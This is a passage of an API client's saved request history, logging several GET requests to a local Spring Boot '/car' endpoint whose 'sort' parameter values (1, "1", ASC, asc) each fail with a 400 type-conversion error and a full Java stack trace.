null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"sort\",\"type\":\"Text\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort\\u003d1\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:32:17 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 1\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 1 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;sort\\u0026#39;: rejected value [1]; codes [typeMismatch.pageRequest.sort,typeMismatch.sort,typeMismatch.org.springframework.data.domain.Sort,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.sort,sort]; arguments []; default message [sort]]; default message [Failed to convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;; nested exception is java.lang.IllegalStateException: Cannot convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;: no matching editors or conversion strategy found]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":32.0,\"second\":17.0,\"nano\":2.050812E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"sort\",\"type\":\"Text\",\"value\":\"\\\"1\\\"\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort\\u003d\\\"1\\\"\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:32:46 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 1\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 1 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;sort\\u0026#39;: rejected value [\\u0026quot;1\\u0026quot;]; codes [typeMismatch.pageRequest.sort,typeMismatch.sort,typeMismatch.org.springframework.data.domain.Sort,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.sort,sort]; arguments []; default message [sort]]; default message [Failed to convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;; nested exception is java.lang.IllegalStateException: Cannot convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;: no matching editors or conversion strategy found]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":32.0,\"second\":46.0,\"nano\":5.077455E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"sort\",\"type\":\"Text\",\"value\":\"ASC\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort\\u003dASC\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:32:53 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 1\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 1 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;sort\\u0026#39;: rejected value [ASC]; codes [typeMismatch.pageRequest.sort,typeMismatch.sort,typeMismatch.org.springframework.data.domain.Sort,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.sort,sort]; arguments []; default message [sort]]; default message [Failed to convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;; nested exception is java.lang.IllegalStateException: Cannot convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;: no matching editors or conversion strategy found]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":32.0,\"second\":53.0,\"nano\":5.29493E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"sort\",\"type\":\"Text\",\"value\":\"asc\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort\\u003dasc\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:33:10 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 1\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 1 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;sort\\u0026#39;: rejected value [asc]; codes [typeMismatch.pageRequest.sort,typeMismatch.sort,typeMismatch.org.springframework.data.domain.Sort,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.sort,sort]; arguments []; default message [sort]]; default message [Failed to convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;; nested exception is java.lang.IllegalStateException: Cannot convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type 